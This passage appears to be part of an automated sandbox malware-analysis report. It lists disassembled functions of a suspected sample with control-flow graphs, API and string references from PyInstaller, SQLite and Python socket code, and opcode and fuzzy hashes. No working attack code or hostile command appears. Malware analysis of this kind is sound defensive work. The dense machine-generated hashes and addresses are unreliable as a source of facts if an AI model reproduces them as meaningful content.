2334 7ffb0c0a4839 call 7ffb0c03fec0 2327->2334 2328->2279 2328->2299 2336 7ffb0c0a45f8-7ffb0c0a45fb 2330->2336 2337 7ffb0c0a460b-7ffb0c0a4613 call 7ffb0c08a830 2330->2337 2341 7ffb0c0a46e8 2331->2341 2342 7ffb0c0a46ec-7ffb0c0a46f4 2331->2342 2338 7ffb0c0a46b6-7ffb0c0a46bd 2332->2338 2339 7ffb0c0a46a6-7ffb0c0a46ab 2332->2339 2353 7ffb0c0a4666-7ffb0c0a466d 2333->2353 2354 7ffb0c0a4632-7ffb0c0a4663 2333->2354 2334->2328 2336->2337 2347 7ffb0c0a45fd-7ffb0c0a45ff 2336->2347 2337->2324 2351 7ffb0c0a46c0-7ffb0c0a46ce call 7ffb0c042e50 2338->2351 2348 7ffb0c0a46b4 2339->2348 2349 7ffb0c0a46ad-7ffb0c0a46b2 2339->2349 2341->2342 2343 7ffb0c0a46f6-7ffb0c0a4709 call 7ffb0c026880 2342->2343 2344 7ffb0c0a473c-7ffb0c0a473e 2342->2344 2368 7ffb0c0a470b-7ffb0c0a471d 2343->2368 2369 7ffb0c0a4722-7ffb0c0a4729 2343->2369 2357 7ffb0c0a474b-7ffb0c0a47a2 call 7ffb0c029170 call 7ffb0c09cf30 2344->2357 2358 7ffb0c0a4740-7ffb0c0a4744 2344->2358 2346->2314 2347->2337 2356 7ffb0c0a4601-7ffb0c0a4606 2347->2356 2348->2338 2349->2351 2351->2331 2361 7ffb0c0a4677-7ffb0c0a4680 2353->2361 2362 7ffb0c0a466f-7ffb0c0a4672 call 7ffb0c026400 2353->2362 2354->2353 2364 7ffb0c0a481a-7ffb0c0a481e 2356->2364 2376 7ffb0c0a47a7-7ffb0c0a47b9 2357->2376 2358->2357 2365 7ffb0c0a4746 2358->2365 2361->2364 2362->2361 2364->2326 2371 7ffb0c0a4820-7ffb0c0a4824 call 7ffb0c044b80 2364->2371 2365->2357 2368->2369 2373 7ffb0c0a4733-7ffb0c0a4737 2369->2373 2374 7ffb0c0a472b-7ffb0c0a472e call 7ffb0c026400 2369->2374 2371->2326 2373->2364 2374->2373 2378 7ffb0c0a47c6-7ffb0c0a47c8 2376->2378 2379 7ffb0c0a47bb-7ffb0c0a47c1 call 7ffb0c026400 2376->2379 2381 7ffb0c0a47d5-7ffb0c0a47d9 2378->2381 2382 7ffb0c0a47ca-7ffb0c0a47d0 call 7ffb0c07e490 2378->2382 2379->2378 2384 7ffb0c0a47db-7ffb0c0a47f0 call 7ffb0c081310 2381->2384 2385 7ffb0c0a47f2-7ffb0c0a47f4 2381->2385 2382->2381 2384->2364 2387 7ffb0c0a47f6-7ffb0c0a47fe 2385->2387 2388 7ffb0c0a4805-7ffb0c0a4815 2385->2388 2387->2364 2390 7ffb0c0a4800-7ffb0c0a4803 2387->2390 2388->2364 2390->2364 2390->2388
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-879093740
                                                                                                                                                                                                                                                                    • Opcode ID: e170ef40a4f3ef8d4980dc40dd55d35e8b3872a5a5acbb993ef25cbf03bf03a6
                                                                                                                                                                                                                                                                    • Instruction ID: 4eba075c3f63e8d490b51206008d678b83bd88f68e9157a9c80bf0509700f7aa
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e170ef40a4f3ef8d4980dc40dd55d35e8b3872a5a5acbb993ef25cbf03bf03a6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DE1BBE6E0879286EB14CBB5D048ABD27A5FF44B88F055271CE0C177A1EF78E852C344
                                                                                                                                                                                                                                                                    Function 00007FF7C2661210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 2391 7ff7c2661210-7ff7c266126d call 7ff7c266bdf0 2394 7ff7c2661297-7ff7c26612af call 7ff7c2674fb4 2391->2394 2395 7ff7c266126f-7ff7c2661296 call 7ff7c2662710 2391->2395 2400 7ff7c26612d4-7ff7c26612e4 call 7ff7c2674fb4 2394->2400 2401 7ff7c26612b1-7ff7c26612cf call 7ff7c2674f78 call 7ff7c2662910 2394->2401 2406 7ff7c2661309-7ff7c266131b 2400->2406 2407 7ff7c26612e6-7ff7c2661304 call 7ff7c2674f78 call 7ff7c2662910 2400->2407 2412 7ff7c2661439-7ff7c266146d call 7ff7c266bad0 call 7ff7c2674fa0 * 2 2401->2412 2411 7ff7c2661320-7ff7c2661345 call 7ff7c267040c 2406->2411 2407->2412 2420 7ff7c266134b-7ff7c2661355 call 7ff7c2670180 2411->2420 2421 7ff7c2661431 2411->2421 2420->2421 2426 7ff7c266135b-7ff7c2661367 2420->2426 2421->2412 2429 7ff7c2661370-7ff7c2661398 call 7ff7c266a230 2426->2429 2432 7ff7c266139a-7ff7c266139d 2429->2432 2433 7ff7c2661416-7ff7c266142c call 7ff7c2662710 2429->2433 2434 7ff7c266139f-7ff7c26613a9 2432->2434 2435 7ff7c2661411 2432->2435 2433->2421 2437 7ff7c26613ab-7ff7c26613b9 call 7ff7c2670b4c 2434->2437 2438 7ff7c26613d4-7ff7c26613d7 2434->2438 2435->2433 2443 7ff7c26613be-7ff7c26613c1 2437->2443 2440 7ff7c26613ea-7ff7c26613ef 2438->2440 2441 7ff7c26613d9-7ff7c26613e7 call 7ff7c2689ea0 2438->2441 2440->2429 2442 7ff7c26613f5-7ff7c26613f8 2440->2442 2441->2440 2446 7ff7c266140c-7ff7c266140f 2442->2446 2447 7ff7c26613fa-7ff7c26613fd 2442->2447 2448 7ff7c26613c3-7ff7c26613cd call 7ff7c2670180 2443->2448 2449 7ff7c26613cf-7ff7c26613d2 2443->2449 2446->2421 2447->2433 2450 7ff7c26613ff-7ff7c2661407 2447->2450 2448->2440 2448->2449 2449->2433 2450->2411
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                                    • Opcode ID: d1e98af981c38af556f8ae3374d5d3c26190a069fecd9da32f136ef13cde2e87
                                                                                                                                                                                                                                                                    • Instruction ID: 013edc6fe4290a9722309ce62581d231d2c44df3182eafa82d29c95cdecacf6e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1e98af981c38af556f8ae3374d5d3c26190a069fecd9da32f136ef13cde2e87
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F151B622A08A4281EA60BF15A4503B9A2A2FF85BA4FC44135ED8D67FD5DFBCD541C734
                                                                                                                                                                                                                                                                    Function 00007FFB1BA45190 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114networkCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 2453 7ffb1ba45190-7ffb1ba451c4 2454 7ffb1ba451c7-7ffb1ba451ca 2453->2454 2455 7ffb1ba451dc-7ffb1ba451df 2454->2455 2456 7ffb1ba451cc-7ffb1ba451d4 2454->2456 2459 7ffb1ba451e1-7ffb1ba451ed call 7ffb1ba493d8 2455->2459 2460 7ffb1ba45203-7ffb1ba45212 call 7ffb1ba49440 2455->2460 2457 7ffb1ba4527b-7ffb1ba45289 call 7ffb1ba49548 2456->2457 2458 7ffb1ba451da 2456->2458 2506 7ffb1ba4528c call 7ffb1ba46894 2457->2506 2507 7ffb1ba4528c call 7ffb1ba462b4 2457->2507 2461 7ffb1ba45215 2458->2461 2468 7ffb1ba45218-7ffb1ba45230 call 7ffb1ba44594 2459->2468 2470 7ffb1ba451ef-7ffb1ba451f2 2459->2470 2460->2461 2461->2468 2476 7ffb1ba45272-7ffb1ba45275 2468->2476 2477 7ffb1ba45232-7ffb1ba45235 2468->2477 2472 7ffb1ba4530c-7ffb1ba4531d call 7ffb1ba494d8 2470->2472 2473 7ffb1ba451f8-7ffb1ba451fe 2470->2473 2479 7ffb1ba45323 2472->2479 2473->2479 2474 7ffb1ba45290-7ffb1ba4529d call 7ffb1ba49468 2484 7ffb1ba452fd-7ffb1ba45300 2474->2484 2485 7ffb1ba4529f-7ffb1ba452a2 2474->2485 2476->2457 2476->2470 2481 7ffb1ba4523f-7ffb1ba4524a WSAGetLastError 2477->2481 2482 7ffb1ba45237-7ffb1ba4523d WSAGetLastError 2477->2482 2483 7ffb1ba45328-7ffb1ba45336 2479->2483 2486 7ffb1ba45250-7ffb1ba45258 call 7ffb1ba493b0 2481->2486 2487 7ffb1ba452f8-7ffb1ba452fb 2481->2487 2482->2481 2488 7ffb1ba45302 2484->2488 2489 7ffb1ba45308-7ffb1ba4530a 2484->2489 2490 7ffb1ba452ac-7ffb1ba452b7 WSAGetLastError 2485->2490 2491 7ffb1ba452a4-7ffb1ba452aa WSAGetLastError 2485->2491 2486->2454 2498 7ffb1ba4525e-7ffb1ba45261 2486->2498 2487->2479 2488->2489 2489->2483 2494 7ffb1ba452c5-7ffb1ba452ca 2490->2494 2495 7ffb1ba452b9-7ffb1ba452c1 call 7ffb1ba493b0 2490->2495 2491->2490 2499 7ffb1ba452cc-7ffb1ba452db WSAGetLastError 2494->2499 2500 7ffb1ba452f3-7ffb1ba452f6 2494->2500 2495->2457 2504 7ffb1ba452c3 2495->2504 2498->2479 2502 7ffb1ba45267-7ffb1ba4526d 2498->2502 2499->2454 2503 7ffb1ba452e1-7ffb1ba452ec WSAGetLastError 2499->2503 2500->2479 2500->2487 2502->2479 2503->2500 2505 7ffb1ba452ee 2503->2505 2504->2498 2505->2454 2506->2474 2507->2474
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$select
                                                                                                                                                                                                                                                                    • String ID: timed out
                                                                                                                                                                                                                                                                    • API String ID: 1043644060-3163636755
                                                                                                                                                                                                                                                                    • Opcode ID: 2fa3c06ebeaf9c0b40a6faa06e916f4905ba1cf81e27fc86f0a827eb6aef7c75
                                                                                                                                                                                                                                                                    • Instruction ID: 236b644816a8106e11562bbe1ef427c5e2574afe9b01e499b263273b0ee788b8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fa3c06ebeaf9c0b40a6faa06e916f4905ba1cf81e27fc86f0a827eb6aef7c75
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD41BEA1E2CE0286FA685B75E4442396292FF45B74F0CE331DE9D42AB4DF3CE8858601
                                                                                                                                                                                                                                                                    Function 00007FF7C26636B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,00007FF7C2663804), ref: 00007FF7C26636E1
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7C2663804), ref: 00007FF7C26636EB
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2662C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C2663706,?,00007FF7C2663804), ref: 00007FF7C2662C9E
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2662C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C2663706,?,00007FF7C2663804), ref: 00007FF7C2662D63
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2662C50: MessageBoxW.USER32 ref: 00007FF7C2662D99
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                                    • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                                    • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                                    • Instruction ID: 4133b74280d9d2b8651899db4c27cb38a9961711c748b40e9f9c750c72edb290
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70217461B1864281FA20BF20E8543B59262BF94768FC00136D9DDA3FD5EEBCE515C338
                                                                                                                                                                                                                                                                    Function 00007FF7C267BACC Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                                                                    • Instruction ID: 50657baf3df4cdfbdea6d67b2f69fd4d24220e9b3d3ca57c05f04a0d927bd32c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16C1832290868681E651BF25A4442BDE762EB81FA0FD54131EACE23BD1DFFCE855C770
                                                                                                                                                                                                                                                                    Function 00007FFB0C058F60 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 139COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • 00007FFB1C263010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FFB0C09D0A0), ref: 00007FFB0C0590FD
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-3538577999
                                                                                                                                                                                                                                                                    • Opcode ID: 8aee8216e6bb90ed0f6427045674268c568246bd6dcf235ef98a3a1ed13a0b1f
                                                                                                                                                                                                                                                                    • Instruction ID: a65c089272efcfd1b11068630e4f427a687631393f92e62efed79d9a7e24d827
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8aee8216e6bb90ed0f6427045674268c568246bd6dcf235ef98a3a1ed13a0b1f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0451BFE1A0E692C7FA159B35D418ABA6391AF84B90F485531DE5D0B3C5EF3EEC42C308
                                                                                                                                                                                                                                                                    Function 00007FFB1BA46C9C Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: setsockopt
                                                                                                                                                                                                                                                                    • String ID: iiO!I:setsockopt$iii:setsockopt$iiy*:setsockopt$socket option is larger than %i bytes
                                                                                                                                                                                                                                                                    • API String ID: 3981526788-1608436615
                                                                                                                                                                                                                                                                    • Opcode ID: e5620e990f8220b448d5b59fe45baab9dc0f6dbd4740d24abe31777b74632af3
                                                                                                                                                                                                                                                                    • Instruction ID: 703ad5c85638447a5f573ec54dc637e68f2f1f14383e3b625e2dffdb6f066076
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5620e990f8220b448d5b59fe45baab9dc0f6dbd4740d24abe31777b74632af3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE414DB1618E86C6EB248F25E4407A97362FB88BA4F589232DA8D43B74DF3CD549C740
                                                                                                                                                                                                                                                                    Function 00007FF7C2666350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                                    • Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                                                                    • Instruction ID: cead83cd1ccf990a599cd26594d67f04881fba9857dd11e7a31f7606ff52a15b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2416021A19A86D1EA25EF20E4142E9A322FB54364FC04132DADD63F99EFBCE515C374
                                                                                                                                                                                                                                                                    Function 00007FFB0C02FFD0 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 409fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                                    • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
